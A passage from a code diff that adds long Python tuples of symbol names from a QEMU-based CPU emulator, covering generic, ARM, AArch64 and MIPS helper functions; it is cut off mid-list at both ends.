'memory_region_del_subregion', + 'memory_region_destructor_alias', + 'memory_region_destructor_none', + 'memory_region_destructor_ram', + 'memory_region_destructor_ram_from_ptr', + 'memory_region_dispatch_read', + 'memory_region_dispatch_read1', + 'memory_region_dispatch_write', + 'memory_region_escape_name', + 'memory_region_finalize', + 'memory_region_find', + 'memory_region_get_addr', + 'memory_region_get_alignment', + 'memory_region_get_container', + 'memory_region_get_fd', + 'memory_region_get_may_overlap', + 'memory_region_get_priority', + 'memory_region_get_ram_addr', + 'memory_region_get_ram_ptr', + 'memory_region_get_size', + 'memory_region_info', + 'memory_region_init', + 'memory_region_init_alias', + 'memory_region_initfn', + 'memory_region_init_io', + 'memory_region_init_ram', + 'memory_region_init_ram_ptr', + 'memory_region_init_reservation', + 'memory_region_is_iommu', + 'memory_region_is_logging', + 'memory_region_is_mapped', + 'memory_region_is_ram', + 'memory_region_is_rom', + 'memory_region_is_romd', + 'memory_region_is_skip_dump', + 'memory_region_is_unassigned', + 'memory_region_name', + 'memory_region_need_escape', + 'memory_region_oldmmio_read_accessor', + 'memory_region_oldmmio_write_accessor', + 'memory_region_present', + 'memory_region_read_accessor', + 'memory_region_readd_subregion', + 'memory_region_ref', + 'memory_region_resolve_container', + 'memory_region_rom_device_set_romd', + 'memory_region_section_get_iotlb', + 'memory_region_set_address', + 'memory_region_set_alias_offset', + 'memory_region_set_enabled', + 'memory_region_set_readonly', + 'memory_region_set_skip_dump', + 'memory_region_size', + 'memory_region_to_address_space', + 'memory_region_transaction_begin', + 'memory_region_transaction_commit', + 'memory_region_unref', + 'memory_region_update_container_subregions', + 'memory_region_write_accessor', + 'memory_region_wrong_endianness', + 'memory_try_enable_merging', + 'module_call_init', + 'module_load', + 'mpidr_cp_reginfo', + 'mpidr_read', + 'msr_mask', + 'mul128By64To192', + 'mul128To256', + 'mul64To128', + 'muldiv64', + 'neon_2rm_is_float_op', + 'neon_2rm_sizes', + 'neon_3r_sizes', + 'neon_get_scalar', + 'neon_load_reg', + 'neon_load_reg64', + 'neon_load_scratch', + 'neon_ls_element_type', + 'neon_reg_offset', + 'neon_store_reg', + 'neon_store_reg64', + 'neon_store_scratch', + 'new_ldst_label', + 'next_list', + 'normalizeFloat128Subnormal', + 'normalizeFloat16Subnormal', + 'normalizeFloat32Subnormal', + 'normalizeFloat64Subnormal', + 'normalizeFloatx80Subnormal', + 'normalizeRoundAndPackFloat128', + 'normalizeRoundAndPackFloat32', + 'normalizeRoundAndPackFloat64', + 'normalizeRoundAndPackFloatx80', + 'not_v6_cp_reginfo', + 'not_v7_cp_reginfo', + 'not_v8_cp_reginfo', + 'object_child_foreach', + 'object_class_foreach', + 'object_class_foreach_tramp', + 'object_class_get_list', + 'object_class_get_list_tramp', + 'object_class_get_parent', + 'object_deinit', + 'object_dynamic_cast', + 'object_finalize', + 'object_finalize_child_property', + 'object_get_child_property', + 'object_get_link_property', + 'object_get_root', + 'object_initialize_with_type', + 'object_init_with_type', + 'object_instance_init', + 'object_new_with_type', + 'object_post_init_with_type', + 'object_property_add_alias', + 'object_property_add_link', + 'object_property_add_uint16_ptr', + 'object_property_add_uint32_ptr', + 'object_property_add_uint64_ptr', + 'object_property_add_uint8_ptr', + 'object_property_allow_set_link', + 'object_property_del', + 'object_property_del_all', + 'object_property_find', + 'object_property_get', + 'object_property_get_bool', + 'object_property_get_int', + 'object_property_get_link', + 'object_property_get_qobject', + 'object_property_get_str', + 'object_property_get_type', + 'object_property_is_child', + 'object_property_set', + 'object_property_set_description', + 'object_property_set_link', + 'object_property_set_qobject', + 'object_release_link_property', + 'object_resolve_abs_path', + 'object_resolve_child_property', + 'object_resolve_link', + 'object_resolve_link_property', + 'object_resolve_partial_path', + 'object_resolve_path', + 'object_resolve_path_component', + 'object_resolve_path_type', + 'object_set_link_property', + 'object_unparent', + 'omap_cachemaint_write', + 'omap_cp_reginfo', + 'omap_threadid_write', + 'omap_ticonfig_write', + 'omap_wfi_write', + 'op_bits', + 'open_modeflags', + 'op_to_mov', + 'op_to_movi', + 'output_type_enum', + 'packFloat128', + 'packFloat16', + 'packFloat32', + 'packFloat64', + 'packFloatx80', + 'page_find', + 'page_find_alloc', + 'page_flush_tb', + 'page_flush_tb_1', + 'page_init', + 'page_size_init', + 'par', + 'parse_array', + 'parse_error', + 'parse_escape', + 'parse_keyword', + 'parse_literal', + 'parse_object', + 'parse_optional', + 'parse_option_bool', + 'parse_option_number', + 'parse_option_size', + 'parse_pair', + 'parser_context_free', + 'parser_context_new', + 'parser_context_peek_token', + 'parser_context_pop_token', + 'parser_context_restore', + 'parser_context_save', + 'parse_str', + 'parse_type_bool', + 'parse_type_int', + 'parse_type_number', + 'parse_type_size', + 'parse_type_str', + 'parse_value', + 'par_write', + 'patch_reloc', + 'phys_map_node_alloc', + 'phys_map_node_reserve', + 'phys_mem_alloc', + 'phys_mem_set_alloc', + 'phys_page_compact', + 'phys_page_compact_all', + 'phys_page_find', + 'phys_page_set', + 'phys_page_set_level', + 'phys_section_add', + 'phys_section_destroy', + 'phys_sections_free', + 'pickNaN', + 'pickNaNMulAdd', + 'pmccfiltr_write', + 'pmccntr_read', + 'pmccntr_sync', + 'pmccntr_write', + 'pmccntr_write32', + 'pmcntenclr_write', + 'pmcntenset_write', + 'pmcr_write', + 'pmintenclr_write', + 'pmintenset_write', + 'pmovsr_write', + 'pmreg_access', + 'pmsav5_cp_reginfo', + 'pmsav5_data_ap_read', + 'pmsav5_data_ap_write', + 'pmsav5_insn_ap_read', + 'pmsav5_insn_ap_write', + 'pmuserenr_write', + 'pmxevtyper_write', + 'print_type_bool', + 'print_type_int', + 'print_type_number', + 'print_type_size', + 'print_type_str', + 'propagateFloat128NaN', + 'propagateFloat32MulAddNaN', + 'propagateFloat32NaN', + 'propagateFloat64MulAddNaN', + 'propagateFloat64NaN', + 'propagateFloatx80NaN', + 'property_get_alias', + 'property_get_bool', + 'property_get_str', + 'property_get_uint16_ptr', + 'property_get_uint32_ptr', + 'property_get_uint64_ptr', + 'property_get_uint8_ptr', + 'property_release_alias', + 'property_release_bool', + 'property_release_str', + 'property_resolve_alias', + 'property_set_alias', + 'property_set_bool', + 'property_set_str', + 'pstate_read', + 'pstate_write', + 'pxa250_initfn', + 'pxa255_initfn', + 'pxa260_initfn', + 'pxa261_initfn', + 'pxa262_initfn', + 'pxa270a0_initfn', + 'pxa270a1_initfn', + 'pxa270b0_initfn', + 'pxa270b1_initfn', + 'pxa270c0_initfn', + 'pxa270c5_initfn', + 'qapi_dealloc_end_implicit_struct', + 'qapi_dealloc_end_list', + 'qapi_dealloc_end_struct', + 'qapi_dealloc_get_visitor', + 'qapi_dealloc_next_list', + 'qapi_dealloc_pop', + 'qapi_dealloc_push', + 'qapi_dealloc_start_implicit_struct', + 'qapi_dealloc_start_list', + 'qapi_dealloc_start_struct', + 'qapi_dealloc_start_union', + 'qapi_dealloc_type_bool', + 'qapi_dealloc_type_enum', + 'qapi_dealloc_type_int', + 'qapi_dealloc_type_number', + 'qapi_dealloc_type_size', + 'qapi_dealloc_type_str', + 'qapi_dealloc_visitor_cleanup', + 'qapi_dealloc_visitor_new', + 'qapi_free_boolList', + 'qapi_free_ErrorClassList', + 'qapi_free_int16List', + 'qapi_free_int32List', + 'qapi_free_int64List', + 'qapi_free_int8List', + 'qapi_free_intList', + 'qapi_free_numberList', + 'qapi_free_strList', + 'qapi_free_uint16List', + 'qapi_free_uint32List', + 'qapi_free_uint64List', + 'qapi_free_uint8List', + 'qapi_free_X86CPUFeatureWordInfo', + 'qapi_free_X86CPUFeatureWordInfoList', + 'qapi_free_X86CPURegister32List', + 'qbool_destroy_obj', + 'qbool_from_int', + 'qbool_get_int', + 'qbool_type', + 'qbus_create', + 'qbus_create_inplace', + 'qbus_finalize', + 'qbus_initfn', + 'qbus_realize', + 'qdev_create', + 'qdev_get_type', + 'qdev_register_types', + 'qdev_set_parent_bus', + 'qdev_try_create', + 'qdict_add_key', + 'qdict_array_split', + 'qdict_clone_shallow', + 'qdict_del', + 'qdict_destroy_obj', + 'qdict_entry_key', + 'qdict_entry_value', + 'qdict_extract_subqdict', + 'qdict_find', + 'qdict_first', + 'qdict_flatten', + 'qdict_flatten_qdict', + 'qdict_flatten_qlist', + 'qdict_get', + 'qdict_get_bool', + 'qdict_get_double', + 'qdict_get_int', + 'qdict_get_obj', + 'qdict_get_qdict', + 'qdict_get_qlist', + 'qdict_get_str', + 'qdict_get_try_bool', + 'qdict_get_try_int', + 'qdict_get_try_str', + 'qdict_haskey', + 'qdict_has_prefixed_entries', + 'qdict_iter', + 'qdict_join', + 'qdict_new', + 'qdict_next', + 'qdict_next_entry', + 'qdict_put_obj', + 'qdict_size', + 'qdict_type', + 'qemu_clock_get_us', + 'qemu_clock_ptr', + 'qemu_clocks', + 'qemu_get_cpu', + 'qemu_get_guest_memory_mapping', + 'qemu_get_guest_simple_memory_mapping', + 'qemu_get_ram_block', + 'qemu_get_ram_block_host_ptr', + 'qemu_get_ram_fd', + 'qemu_get_ram_ptr', + 'qemu_host_page_mask', + 'qemu_host_page_size', + 'qemu_init_vcpu', + 'qemu_ld_helpers', + 'qemu_log_close', + 'qemu_log_enabled', + 'qemu_log_flush', + 'qemu_loglevel_mask', + 'qemu_log_vprintf', + 'qemu_oom_check', + 'qemu_parse_fd', + 'qemu_ram_addr_from_host', + 'qemu_ram_addr_from_host_nofail', + 'qemu_ram_alloc', + 'qemu_ram_alloc_from_ptr', + 'qemu_ram_foreach_block', + 'qemu_ram_free', + 'qemu_ram_free_from_ptr', + 'qemu_ram_ptr_length', + 'qemu_ram_remap', + 'qemu_ram_setup_dump', + 'qemu_ram_unset_idstr', + 'qemu_real_host_page_size', + 'qemu_st_helpers', + 'qemu_tcg_init_vcpu', + 'qemu_try_memalign', + 'qentry_destroy', + 'qerror_human', + 'qerror_report', + 'qerror_report_err', + 'qfloat_destroy_obj', + 'qfloat_from_double', + 'qfloat_get_double', + 'qfloat_type', + 'qint_destroy_obj', + 'qint_from_int', + 'qint_get_int', + 'qint_type', + 'qlist_append_obj', + 'qlist_copy', + 'qlist_copy_elem', + 'qlist_destroy_obj', + 'qlist_empty', + 'qlist_entry_obj', + 'qlist_first', + 'qlist_iter', + 'qlist_new', + 'qlist_next', + 'qlist_peek', + 'qlist_pop', + 'qlist_size', + 'qlist_size_iter', + 'qlist_type', + 'qmp_input_end_implicit_struct', + 'qmp_input_end_list', + 'qmp_input_end_struct', + 'qmp_input_get_next_type', + 'qmp_input_get_object', + 'qmp_input_get_visitor', + 'qmp_input_next_list', + 'qmp_input_optional', + 'qmp_input_pop', + 'qmp_input_push', + 'qmp_input_start_implicit_struct', + 'qmp_input_start_list', + 'qmp_input_start_struct', + 'qmp_input_type_bool', + 'qmp_input_type_int', + 'qmp_input_type_number', + 'qmp_input_type_str', + 'qmp_input_visitor_cleanup', + 'qmp_input_visitor_new', + 'qmp_input_visitor_new_strict', + 'qmp_output_add_obj', + 'qmp_output_end_list', + 'qmp_output_end_struct', + 'qmp_output_first', + 'qmp_output_get_qobject', + 'qmp_output_get_visitor', + 'qmp_output_last', + 'qmp_output_next_list', + 'qmp_output_pop', + 'qmp_output_push_obj', + 'qmp_output_start_list', + 'qmp_output_start_struct', + 'qmp_output_type_bool', + 'qmp_output_type_int', + 'qmp_output_type_number', + 'qmp_output_type_str', + 'qmp_output_visitor_cleanup', + 'qmp_output_visitor_new', + 'qobject_decref', + 'qobject_to_qbool', + 'qobject_to_qdict', + 'qobject_to_qfloat', + 'qobject_to_qint', + 'qobject_to_qlist', + 'qobject_to_qstring', + 'qobject_type', + 'qstring_append', + 'qstring_append_chr', + 'qstring_append_int', + 'qstring_destroy_obj', + 'qstring_from_escaped_str', + 'qstring_from_str', + 'qstring_from_substr', + 'qstring_get_length', + 'qstring_get_str', + 'qstring_new', + 'qstring_type', + 'ram_block_add', + 'ram_size', + 'range_compare', + 'range_covers_byte', + 'range_get_last', + 'range_merge', + 'ranges_can_merge', + 'raw_read', + 'raw_write', + 'rcon', + 'read_raw_cp_reg', + 'recip_estimate', + 'recip_sqrt_estimate', + 'register_cp_regs_for_features', + 'register_multipage', + 'register_subpage', + 'register_tm_clones', + 'register_types_object', + 'regnames', + 'render_memory_region', + 'reset_all_temps', + 'reset_temp', + 'rol32', + 'rol64', + 'ror32', + 'ror64', + 'roundAndPackFloat128', + 'roundAndPackFloat16', + 'roundAndPackFloat32', + 'roundAndPackFloat64', + 'roundAndPackFloatx80', + 'roundAndPackInt32', + 'roundAndPackInt64', + 'roundAndPackUint64', + 'round_to_inf', + 'run_on_cpu', + 's0', + 'S0', + 's1', + 'S1', + 'sa1100_initfn', + 'sa1110_initfn', + 'save_globals', + 'scr_write', + 'sctlr_write', + 'set_bit', + 'set_bits', + 'set_default_nan_mode', + 'set_feature', + 'set_float_detect_tininess', + 'set_float_exception_flags', + 'set_float_rounding_mode', + 'set_flush_inputs_to_zero', + 'set_flush_to_zero', + 'set_swi_errno', + 'sextract32', + 'sextract64', + 'shift128ExtraRightJamming', + 'shift128Right', + 'shift128RightJamming', + 'shift32RightJamming', + 'shift64ExtraRightJamming', + 'shift64RightJamming', + 'shifter_out_im', + 'shortShift128Left', + 'shortShift192Left', + 'simple_mpu_ap_bits', + 'size_code_gen_buffer', + 'softmmu_lock_user', + 'softmmu_lock_user_string', + 'softmmu_tget32', + 'softmmu_tget8', + 'softmmu_tput32', + 'softmmu_unlock_user', + 'sort_constraints', + 'sp_el0_access', + 'spsel_read', + 'spsel_write', + 'start_list', + 'stb_p', + 'stb_phys', + 'stl_be_p', + 'stl_be_phys', + 'stl_he_p', + 'stl_le_p', + 'stl_le_phys', + 'stl_phys', + 'stl_phys_internal', + 'stl_phys_notdirty', + 'store_cpu_offset', + 'store_reg', + 'store_reg_bx', + 'store_reg_from_load', + 'stq_be_p', + 'stq_be_phys', + 'stq_he_p', + 'stq_le_p', + 'stq_le_phys', + 'stq_phys', + 'string_input_get_visitor', + 'string_input_visitor_cleanup', + 'string_input_visitor_new', + 'strongarm_cp_reginfo', + 'strstart', + 'strtosz', + 'strtosz_suffix', + 'stw_be_p', + 'stw_be_phys', + 'stw_he_p', + 'stw_le_p', + 'stw_le_phys', + 'stw_phys', + 'stw_phys_internal', + 'sub128', + 'sub16_sat', + 'sub16_usat', + 'sub192', + 'sub8_sat', + 'sub8_usat', + 'subFloat128Sigs', + 'subFloat32Sigs', + 'subFloat64Sigs', + 'subFloatx80Sigs', + 'subpage_accepts', + 'subpage_init', + 'subpage_ops', + 'subpage_read', + 'subpage_register', + 'subpage_write', + 'suffix_mul', + 'swap_commutative', + 'swap_commutative2', + 'switch_mode', + 'switch_v7m_sp', + 'syn_aa32_bkpt', + 'syn_aa32_hvc', + 'syn_aa32_smc', + 'syn_aa32_svc', + 'syn_breakpoint', + 'sync_globals', + 'syn_cp14_rrt_trap', + 'syn_cp14_rt_trap', + 'syn_cp15_rrt_trap', + 'syn_cp15_rt_trap', + 'syn_data_abort', + 'syn_fp_access_trap', + 'syn_insn_abort', + 'syn_swstep', + 'syn_uncategorized', + 'syn_watchpoint', + 'syscall_err', + 'system_bus_class_init', + 'system_bus_info', + 't2ee_cp_reginfo', + 'table_logic_cc', + 'target_parse_constraint', + 'target_words_bigendian', + 'tb_add_jump', + 'tb_alloc', + 'tb_alloc_page', + 'tb_check_watchpoint', + 'tb_find_fast', + 'tb_find_pc', + 'tb_find_slow', + 'tb_flush', + 'tb_flush_jmp_cache', + 'tb_free', + 'tb_gen_code', + 'tb_hash_remove', + 'tb_invalidate_phys_addr', + 'tb_invalidate_phys_page_range', + 'tb_invalidate_phys_range', + 'tb_jmp_cache_hash_func', + 'tb_jmp_cache_hash_page', + 'tb_jmp_remove', + 'tb_link_page', + 'tb_page_remove', + 'tb_phys_hash_func', + 'tb_phys_invalidate', + 'tb_reset_jump', + 'tb_set_jmp_target', + 'tcg_accel_class_init', + 'tcg_accel_type', + 'tcg_add_param_i32', + 'tcg_add_param_i64', + 'tcg_add_target_add_op_defs', + 'tcg_allowed', + 'tcg_canonicalize_memop', + 'tcg_commit', + 'tcg_cond_to_jcc', + 'tcg_constant_folding', + 'tcg_const_i32', + 'tcg_const_i64', + 'tcg_const_local_i32', + 'tcg_const_local_i64', + 'tcg_context_init', + 'tcg_cpu_address_space_init', + 'tcg_cpu_exec', + 'tcg_current_code_size', + 'tcg_dump_info', + 'tcg_dump_ops', + 'tcg_exec_all', + 'tcg_find_helper', + 'tcg_func_start', + 'tcg_gen_abs_i32', + 'tcg_gen_add2_i32', + 'tcg_gen_add_i32', + 'tcg_gen_add_i64', + 'tcg_gen_addi_i32', + 'tcg_gen_addi_i64', + 'tcg_gen_andc_i32', + 'tcg_gen_and_i32', + 'tcg_gen_and_i64', + 'tcg_gen_andi_i32', + 'tcg_gen_andi_i64', + 'tcg_gen_br', + 'tcg_gen_brcond_i32', + 'tcg_gen_brcond_i64', + 'tcg_gen_brcondi_i32', + 'tcg_gen_bswap16_i32', + 'tcg_gen_bswap32_i32', + 'tcg_gen_callN', + 'tcg_gen_code', + 'tcg_gen_code_common', + 'tcg_gen_code_search_pc', + 'tcg_gen_concat_i32_i64', + 'tcg_gen_debug_insn_start', + 'tcg_gen_deposit_i32', + 'tcg_gen_exit_tb', + 'tcg_gen_ext16s_i32', + 'tcg_gen_ext16u_i32', + 'tcg_gen_ext32s_i64', + 'tcg_gen_ext32u_i64', + 'tcg_gen_ext8s_i32', + 'tcg_gen_ext8u_i32', + 'tcg_gen_ext_i32_i64', + 'tcg_gen_extu_i32_i64', + 'tcg_gen_goto_tb', + 'tcg_gen_ld_i32', + 'tcg_gen_ld_i64', + 'tcg_gen_ldst_op_i32', + 'tcg_gen_ldst_op_i64', + 'tcg_gen_movcond_i32', + 'tcg_gen_movcond_i64', + 'tcg_gen_mov_i32', + 'tcg_gen_mov_i64', + 'tcg_gen_movi_i32', + 'tcg_gen_movi_i64', + 'tcg_gen_mul_i32', + 'tcg_gen_muls2_i32', + 'tcg_gen_mulu2_i32', + 'tcg_gen_neg_i32', + 'tcg_gen_neg_i64', + 'tcg_gen_not_i32', + 'tcg_gen_op0', + 'tcg_gen_op1i', + 'tcg_gen_op2_i32', + 'tcg_gen_op2_i64', + 'tcg_gen_op2i_i32', + 'tcg_gen_op2i_i64', + 'tcg_gen_op3_i32', + 'tcg_gen_op3_i64', + 'tcg_gen_op4_i32', + 'tcg_gen_op4i_i32', + 'tcg_gen_op4ii_i32', + 'tcg_gen_op4ii_i64', + 'tcg_gen_op5ii_i32', + 'tcg_gen_op6_i32', + 'tcg_gen_op6i_i32', + 'tcg_gen_op6i_i64', + 'tcg_gen_orc_i32', + 'tcg_gen_or_i32', + 'tcg_gen_or_i64', + 'tcg_gen_ori_i32', + 'tcg_gen_qemu_ld_i32', + 'tcg_gen_qemu_ld_i64', + 'tcg_gen_qemu_st_i32', + 'tcg_gen_qemu_st_i64', + 'tcg_gen_rotl_i32', + 'tcg_gen_rotli_i32', + 'tcg_gen_rotr_i32', + 'tcg_gen_rotri_i32', + 'tcg_gen_sar_i32', + 'tcg_gen_sari_i32', + 'tcg_gen_setcond_i32', + 'tcg_gen_shl_i32', + 'tcg_gen_shl_i64', + 'tcg_gen_shli_i32', + 'tcg_gen_shli_i64', + 'tcg_gen_shr_i32', + 'tcg_gen_shifti_i64', + 'tcg_gen_shr_i64', + 'tcg_gen_shri_i32', + 'tcg_gen_shri_i64', + 'tcg_gen_st_i32', + 'tcg_gen_st_i64', + 'tcg_gen_sub_i32', + 'tcg_gen_sub_i64', + 'tcg_gen_subi_i32', + 'tcg_gen_trunc_i64_i32', + 'tcg_gen_trunc_shr_i64_i32', + 'tcg_gen_xor_i32', + 'tcg_gen_xor_i64', + 'tcg_gen_xori_i32', + 'tcg_get_arg_str_i32', + 'tcg_get_arg_str_i64', + 'tcg_get_arg_str_idx', + 'tcg_global_mem_new_i32', + 'tcg_global_mem_new_i64', + 'tcg_global_mem_new_internal', + 'tcg_global_reg_new_i32', + 'tcg_global_reg_new_i64', + 'tcg_global_reg_new_internal', + 'tcg_handle_interrupt', + 'tcg_init', + 'tcg_invert_cond', + 'tcg_la_bb_end', + 'tcg_la_br_end', + 'tcg_la_func_end', + 'tcg_liveness_analysis', + 'tcg_malloc', + 'tcg_malloc_internal', + 'tcg_op_defs_org', + 'tcg_opt_gen_mov', + 'tcg_opt_gen_movi', + 'tcg_optimize', + 'tcg_out16', + 'tcg_out32', + 'tcg_out64', + 'tcg_out8', + 'tcg_out_addi', + 'tcg_out_branch', + 'tcg_out_brcond32', + 'tcg_out_brcond64', + 'tcg_out_bswap32', + 'tcg_out_bswap64', + 'tcg_out_call', + 'tcg_out_cmp', + 'tcg_out_ext16s', + 'tcg_out_ext16u', + 'tcg_out_ext32s', + 'tcg_out_ext32u', + 'tcg_out_ext8s', + 'tcg_out_ext8u', + 'tcg_out_jmp', + 'tcg_out_jxx', + 'tcg_out_label', + 'tcg_out_ld', + 'tcg_out_modrm', + 'tcg_out_modrm_offset', + 'tcg_out_modrm_sib_offset', + 'tcg_out_mov', + 'tcg_out_movcond32', + 'tcg_out_movcond64', + 'tcg_out_movi', + 'tcg_out_op', + 'tcg_out_pop', + 'tcg_out_push', + 'tcg_out_qemu_ld', + 'tcg_out_qemu_ld_direct', + 'tcg_out_qemu_ld_slow_path', + 'tcg_out_qemu_st', + 'tcg_out_qemu_st_direct', + 'tcg_out_qemu_st_slow_path', + 'tcg_out_reloc', + 'tcg_out_rolw_8', + 'tcg_out_setcond32', + 'tcg_out_setcond64', + 'tcg_out_shifti', + 'tcg_out_st', + 'tcg_out_tb_finalize', + 'tcg_out_tb_init', + 'tcg_out_tlb_load', + 'tcg_out_vex_modrm', + 'tcg_patch32', + 'tcg_patch8', + 'tcg_pcrel_diff', + 'tcg_pool_reset', + 'tcg_prologue_init', + 'tcg_ptr_byte_diff', + 'tcg_reg_alloc', + 'tcg_reg_alloc_bb_end', + 'tcg_reg_alloc_call', + 'tcg_reg_alloc_mov', + 'tcg_reg_alloc_movi', + 'tcg_reg_alloc_op', + 'tcg_reg_alloc_start', + 'tcg_reg_free', + 'tcg_reg_sync', + 'tcg_set_frame', + 'tcg_set_nop', + 'tcg_swap_cond', + 'tcg_target_callee_save_regs', + 'tcg_target_call_iarg_regs', + 'tcg_target_call_oarg_regs', + 'tcg_target_const_match', + 'tcg_target_init', + 'tcg_target_qemu_prologue', + 'tcg_target_reg_alloc_order', + 'tcg_temp_alloc', + 'tcg_temp_free_i32', + 'tcg_temp_free_i64', + 'tcg_temp_free_internal', + 'tcg_temp_local_new_i32', + 'tcg_temp_local_new_i64', + 'tcg_temp_new_i32', + 'tcg_temp_new_i64', + 'tcg_temp_new_internal', + 'tcg_temp_new_internal_i32', + 'tcg_temp_new_internal_i64', + 'tdb_hash', + 'teecr_write', + 'teehbr_access', + 'temp_allocate_frame', + 'temp_dead', + 'temps_are_copies', + 'temp_save', + 'temp_sync', + 'tgen_arithi', + 'tgen_arithr', + 'thumb2_logic_op', + 'ti925t_initfn', + 'tlb_add_large_page', + 'tlb_flush_entry', + 'tlbi_aa64_asid_is_write', + 'tlbi_aa64_asid_write', + 'tlbi_aa64_vaa_is_write', + 'tlbi_aa64_vaa_write', + 'tlbi_aa64_va_is_write', + 'tlbi_aa64_va_write', + 'tlbiall_is_write', + 'tlbiall_write', + 'tlbiasid_is_write', + 'tlbiasid_write', + 'tlbimvaa_is_write', + 'tlbimvaa_write', + 'tlbimva_is_write', + 'tlbimva_write', + 'tlb_is_dirty_ram', + 'tlb_protect_code', + 'tlb_reset_dirty_range', + 'tlb_reset_dirty_range_all', + 'tlb_set_dirty', + 'tlb_set_dirty1', + 'tlb_unprotect_code_phys', + 'tlb_vaddr_to_host', + 'token_get_type', + 'token_get_value', + 'token_is_escape', + 'token_is_keyword', + 'token_is_operator', + 'tokens_append_from_iter', + 'to_qiv', + 'to_qov', + 'tosa_init', + 'tosa_machine_init', + 'tswap32', + 'tswap64', + 'type_class_get_size', + 'type_get_by_name', + 'type_get_parent', + 'type_has_parent', + 'type_initialize', + 'type_initialize_interface', + 'type_is_ancestor', + 'type_new', + 'type_object_get_size', + 'type_register_internal', + 'type_table_add', + 'type_table_get', + 'type_table_lookup', + 'uint16_to_float32', + 'uint16_to_float64', + 'uint32_to_float32', + 'uint32_to_float64', + 'uint64_to_float128', + 'uint64_to_float32', + 'uint64_to_float64', + 'unassigned_io_ops', + 'unassigned_io_read', + 'unassigned_io_write', + 'unassigned_mem_accepts', + 'unassigned_mem_ops', + 'unassigned_mem_read', + 'unassigned_mem_write', + 'update_spsel', + 'v6_cp_reginfo', + 'v6k_cp_reginfo', + 'v7_cp_reginfo', + 'v7mp_cp_reginfo', + 'v7m_pop', + 'v7m_push', + 'v8_cp_reginfo', + 'v8_el2_cp_reginfo', + 'v8_el3_cp_reginfo', + 'v8_el3_no_el2_cp_reginfo', + 'vapa_cp_reginfo', + 'vbar_write', + 'vfp_exceptbits_from_host', + 'vfp_exceptbits_to_host', + 'vfp_get_fpcr', + 'vfp_get_fpscr', + 'vfp_get_fpsr', + 'vfp_reg_offset', + 'vfp_set_fpcr', + 'vfp_set_fpscr', + 'vfp_set_fpsr', + 'visit_end_implicit_struct', + 'visit_end_list', + 'visit_end_struct', + 'visit_end_union', + 'visit_get_next_type', + 'visit_next_list', + 'visit_optional', + 'visit_start_implicit_struct', + 'visit_start_list', + 'visit_start_struct', + 'visit_start_union', + 'vmsa_cp_reginfo', + 'vmsa_tcr_el1_write', + 'vmsa_ttbcr_raw_write', + 'vmsa_ttbcr_reset', + 'vmsa_ttbcr_write', + 'vmsa_ttbr_write', + 'write_cpustate_to_list', + 'write_list_to_cpustate', + 'write_raw_cp_reg', + 'X86CPURegister32_lookup', + 'x86_op_defs', + 'xpsr_read', + 'xpsr_write', + 'xscale_cpar_write', + 'xscale_cp_reginfo' +) + +arm_symbols = ( + 'ARM_REGS_STORAGE_SIZE', +) + +aarch64_symbols = ( + 'ARM64_REGS_STORAGE_SIZE', + 'arm64_release', + 'arm64_reg_reset', + 'arm64_reg_read', + 'arm64_reg_write', + 'gen_a64_set_pc_im', + 'aarch64_cpu_register_types', + 'helper_udiv64', + 'helper_sdiv64', + 'helper_cls64', + 'helper_cls32', + 'helper_rbit64', + 'helper_vfp_cmps_a64', + 'helper_vfp_cmpes_a64', + 'helper_vfp_cmpd_a64', + 'helper_vfp_cmped_a64', + 'helper_vfp_mulxs', + 'helper_vfp_mulxd', + 'helper_simd_tbl', + 'helper_neon_ceq_f64', + 'helper_neon_cge_f64', + 'helper_neon_cgt_f64', + 'helper_recpsf_f32', + 'helper_recpsf_f64', + 'helper_rsqrtsf_f32', + 'helper_rsqrtsf_f64', + 'helper_neon_addlp_s8', + 'helper_neon_addlp_u8', + 'helper_neon_addlp_s16', + 'helper_neon_addlp_u16', + 'helper_frecpx_f32', + 'helper_frecpx_f64', + 'helper_fcvtx_f64_to_f32', + 'helper_crc32_64', + 'helper_crc32c_64', + 'aarch64_cpu_do_interrupt', + +) + +mips_symbols = ( + 'cpu_mips_exec', + 'cpu_mips_get_random', + 'cpu_mips_get_count', + 'cpu_mips_store_count', + 'cpu_mips_store_compare', + 'cpu_mips_start_count', + 'cpu_mips_stop_count', + 'mips_machine_init', + 'cpu_mips_kseg0_to_phys', + 'cpu_mips_phys_to_kseg0', + 'cpu_mips_kvm_um_phys_to_kseg0', + 'mips_cpu_register_types', + 'cpu_mips_init', + 'cpu_state_reset', + 'helper_msa_andi_b', + 'helper_msa_ori_b', + 'helper_msa_nori_b', + 'helper_msa_xori_b', + 'helper_msa_bmnzi_b', + 'helper_msa_bmzi_b', + 'helper_msa_bseli_b', + 'helper_msa_shf_df', + 'helper_msa_and_v', + 'helper_msa_or_v', + 'helper_msa_nor_v', + 'helper_msa_xor_v', + 'helper_msa_bmnz_v', + 'helper_msa_bmz_v', + 'helper_msa_bsel_v', + 'helper_msa_addvi_df', + 'helper_msa_subvi_df', + 'helper_msa_ceqi_df', + 'helper_msa_clei_s_df', + 'helper_msa_clei_u_df', + 'helper_msa_clti_s_df', + 'helper_msa_clti_u_df', + 'helper_msa_maxi_s_df', + 'helper_msa_maxi_u_df', + 'helper_msa_mini_s_df', + 'helper_msa_mini_u_df', + 'helper_msa_ldi_df', + 'helper_msa_slli_df', + 'helper_msa_srai_df', + 'helper_msa_srli_df', + 'helper_msa_bclri_df', + 'helper_msa_bseti_df', + 'helper_msa_bnegi_df', + 'helper_msa_sat_s_df', + 'helper_msa_sat_u_df', + 'helper_msa_srari_df', + 'helper_msa_srlri_df', + 'helper_msa_binsli_df', + 'helper_msa_binsri_df', + 'helper_msa_sll_df', + 'helper_msa_sra_df', + 'helper_msa_srl_df', + 'helper_msa_bclr_df', + 'helper_msa_bset_df', + 'helper_msa_bneg_df', + 'helper_msa_addv_df', + 'helper_msa_subv_df', + 'helper_msa_max_s_df', + 'helper_msa_max_u_df', + 'helper_msa_min_s_df', + 'helper_msa_min_u_df', + 'helper_msa_max_a_df', + 'helper_msa_min_a_df', + 'helper_msa_ceq_df', + 'helper_msa_clt_s_df', + 'helper_msa_clt_u_df', + 'helper_msa_cle_s_df', + 'helper_msa_cle_u_df', + 'helper_msa_add_a_df', + 'helper_msa_adds_a_df', + 'helper_msa_adds_s_df', + 'helper_msa_adds_u_df', + 'helper_msa_ave_s_df', + 'helper_msa_ave_u_df', + 'helper_msa_aver_s_df', + 'helper_msa_aver_u_df', + 'helper_msa_subs_s_df', + 'helper_msa_subs_u_df', + 'helper_msa_subsus_u_df', + 'helper_msa_subsuu_s_df', + 'helper_msa_asub_s_df', + 'helper_msa_asub_u_df', + 'helper_msa_mulv_df', + 